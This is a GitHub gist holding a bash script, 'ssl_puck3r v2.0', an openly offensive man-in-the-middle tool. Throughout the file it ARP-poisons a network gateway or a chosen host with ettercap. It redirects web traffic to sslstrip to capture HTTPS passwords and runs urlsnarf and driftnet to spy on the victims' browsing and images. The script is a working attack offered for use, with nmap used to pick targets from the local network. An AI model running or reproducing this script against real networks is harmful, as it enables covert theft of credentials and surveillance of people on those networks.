Created
June 18, 2014 16:38
-
-
Save iGh0st/52fee5c642dd45b8f6fb to your computer and use it in GitHub Desktop.
ssl_puck3r v2.0
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# ssl_puck3r v2.0 | |
# Revised 04/24/14 | |
# Created By: n1tr0g3n & R4v3N | |
# Special thanks to TAPE and Acexor for helping test out the script during the coding stages! | |
# http://www.top-hat-sec.com // http://www.n1tr0g3n.com // http://www.red-team-labs.com // http://www.teamctfu.com/ | |
clear | |
# TAPES COLORZ (thanks TAPE!) | |
STD=$(echo -e "\e[0;0;0m") #Revert fonts to standard colour/format | |
RED=$(echo -e "\e[1;31m") #Alter fonts to red bold | |
REDN=$(echo -e "\e[0;31m") #Alter fonts to red normal | |
GRN=$(echo -e "\e[1;32m") #Alter fonts to green bold | |
GRNN=$(echo -e "\e[0;32m") #Alter fonts to green normal | |
BLU=$(echo -e "\e[1;36m") #Alter fonts to blue bold | |
BLUN=$(echo -e "\e[0;36m") #Alter fonts to blue normal | |
DATE=$(date +%h%d-%Y-%H%M) | |
DGATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}') | |
GATELAN() | |
{ | |
echo "" | |
echo $GRN"[*] Starting attack on Gateway" | |
route -n | grep 'UG[ \t]' | awk '{print $2}' | |
sleep 2 | |
#This will start URLSnarf to show the websites the victim browses | |
xterm -e urlsnarf -i $IFACE & | |
#this command will set up all redirection | |
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 | |
#This command will start ettercap | |
ettercap -L $DATE -T -q -i $IFACE -M ARP:REMOTE // // & | |
#This command will start SSLStrip to start sniffing https:// passwords | |
xterm -e sslstrip -a -l 10000 & | |
xterm -e driftnet -i $IFACE & | |
echo | |
echo "[*] Press ENTER to stop session" | |
read ENTERKEY | |
killall sslstrip | |
killall ettercap | |
killall urlsnarf | |
killall xterm | |
echo "0" > /proc/sys/net/ipv4/ip_forward | |
iptables --flush | |
iptables --table nat --flush | |
iptables --delete-chain | |
iptables --table nat --delete-chain | |
} | |
GATEWIFI(){ | |
echo "" | |
#This will allow you to forward packets from the router | |
echo $GRN"[*] Starting attack on gateway" | |
route -n | grep 'UG[ \t]' | awk '{print $2}' | |
sleep 2 | |
#This will start URLSnarf to show the websites the victim browses | |
xterm -e urlsnarf -i $IFACE & | |
#this command will set up all redirection | |
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 | |
#This command will start ettercap | |
ettercap -L $DATE -T -q -i $IFACE -M arp:remote /$DGATEWAY/ // & | |
#sudo xterm -e ettercap -TqM ARP:REMOTE // // & -----> command for LAN | |
#This command will start SSLStrip to start sniffing https:// passwords | |
xterm -e sslstrip -a -l 10000 & | |
xterm -e driftnet -i $IFACE & | |
echo "[*] Press ENTER to stop session" | |
read ENTERKEY | |
killall sslstrip | |
killall ettercap | |
killall urlsnarf | |
killall xterm | |
echo "0" > /proc/sys/net/ipv4/ip_forward | |
iptables --flush | |
iptables --table nat --flush | |
iptables --delete-chain | |
iptables --table nat --delete-chain | |
} | |
SINGLELAN(){ | |
#This will allow you to forward packets from the router | |
echo "" | |
echo "Possible Targets:" | |
nmap -PR -sn $DGATEWAY/24 | sed /'Starting'/d | sed /'MAC'/d | sed /Host/d | sed /'done'/d | sed /addresses/d | sed '2 d' | awk '{print $5}' | |
echo "" | |
echo -n $RED"[*] Please type the IP of the target: "$GRN | |
read HOST3 | |
echo "" | |
echo $GRN"[*] Starting Attack on Target Host" | |
sleep 2 | |
#This will start URLSnarf to show the websites the victim browses | |
xterm -e urlsnarf -i $IFACE & | |
#this command will set up all redirection | |
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 | |
#This command will start ettercap | |
ettercap -L $DATE -T -q -i $IFACE -M ARP:REMOTE /$DGATEWAY/ /$HOST3/ & | |
#This command will start SSLStrip to start sniffing https:// passwords | |
xterm -e sslstrip -a -l 10000 & | |
xterm -e driftnet -i $IFACE & | |
echo "Press ENTER to stop session" | |
read ENTERKEY | |
killall sslstrip | |
killall ettercap | |
killall urlsnarf | |
killall xterm | |
iptables --flush | |
iptables --table nat --flush | |
iptables --delete-chain | |
iptables --table nat --delete-chain | |
} | |
SINGLEWIFI(){ | |
#This will allow you to forward packets from the router | |
echo "Possible Targets:" | |
nmap -PR -sn $DGATEWAY/24 | sed /'Starting'/d | sed /'MAC'/d | sed /Host/d | sed /'done'/d | sed /addresses/d | sed '2 d' | awk '{print $5}' | |
echo "" | |
echo -n $RED"[*] Please type the IP of the target: "$GRN | |
read HOST4 | |
echo "" | |
echo $GRN"[*] Starting Attack on Target Host" | |
#This will start URLSnarf to show the websites the victim browses | |
xterm -e urlsnarf -i $IFACE & | |
#this command will set up all redirection | |
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 | |
#This command will start ettercap | |
ettercap -L $DATE -T -q -i $IFACE -M arp:remote /$DGATEWAY/ /$HOST4/ & | |
#This command will start SSLStrip to start sniffing https:// passwords | |
xterm -e sslstrip -a -l 10000 & | |
xterm -e driftnet -i $IFACE & | |
echo "[*] Press ENTER to stop session" | |
read ENTERKEY | |
killall sslstrip | |
killall ettercap | |
killall urlsnarf | |
killall xterm | |
iptables --flush | |
iptables --table nat --flush | |
iptables --delete-chain | |
iptables --table nat --delete-chain | |
} | |
freset(){ | |
echo "" | |
ifconfig | grep 'eth\|wlan\|ath\|ra\|rausb\|inet addr' | sed /RX/d | |
echo $RED"" | |
echo -n "[*] Select Interface: (e.g. eth0): "$GRN | |
read IFACE | |
fmen | |
} | |
echo $RED''' | |
.__ .__ __ ________ | |
______ _____| | ______ | |__ __ __ ____ | | __\_____ \______ | |
/ ___// ___/ | \____ \| | \| | \_/ ___\| |/ / _(__ <_ __ \ | |
\___ \ \___ \| |__ | |_> > Y \ | /\ \___| < / \ | \/ | |
/____ >____ >____/ | __/|___| /____/ \___ >__|_ \/______ /__| | |
\/ \/ |__| \/ \/ \/ \/ | |
All your https are belong to us // sslphuck3r v2.0 | |
http://www.top-hat-sec.com | |
''' | |
echo "Default Gateway:" "$DGATEWAY" | |
echo $GRN"[*] Select Interface: (e.g. eth0) " | |
echo "" | |
#ifconfig | grep -B 1 Bcast | awk '{print $1, $2}' | tr -d '-' | cut -d : -f 2 | cut -d ' ' -f 1 | |
ifconfig | grep 'eth\|wlan\|ath\|ra\|rausb\|inet addr' | sed /RX/d | |
echo $GRN"" | |
read -p''' | |
[>]''' IFACE | |
fmen(){ | |
IPFORWARD=$(cat /proc/sys/net/ipv4/ip_forward) | |
echo "" | |
echo "Default Gateway: " "$DGATEWAY" | |
if [ "$IPFORWARD" = "1" ]; then | |
echo "IP Forwarding: " $GRN"Enabled" | |
elif [ "$IPFORWARD" = "0" ]; then | |
echo "IP Forwarding: " $RED"Disabled"$GRN | |
else | |
echo "IP Forwarding: " $BLU"Unknown"$GRN | |
fi | |
echo ''' | |
[00] Change Adapter | |
[0] Disable IPv4 Forwarding | |
[1] Enable IPv4 Forwarding | |
[2] LAN - Entire Gateway | |
[3] WIRELESS - Entire Gateway | |
[4] LAN - Single Host | |
[5] WIRELESS - Single Host | |
''' | |
echo $RED"" | |
read -p''' | |
[>] Select Menu Option: '''$GRN menopt | |
echo $GRN"" | |
if [ "$menopt" = "00" ]; then | |
freset | |
elif [ "$menopt" = "0" ]; then | |
echo "0" > /proc/sys/net/ipv4/ip_forward | |
fmen | |
elif [ "$menopt" = "1" ]; then | |
echo "1" > /proc/sys/net/ipv4/ip_forward | |
fmen | |
elif [ "$menopt" = "2" ]; then | |
GATELAN | |
elif [ "$menopt" = "3" ]; then | |
GATEWIFI | |
elif [ "$menopt" = "4" ]; then | |
SINGLELAN | |
elif [ "$menopt" = "5" ]; then | |
SINGLEWIFI | |
else | |
echo "Invalid Option" | |
sleep 2 | |
fmen | |
fi | |
} | |
fmen |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment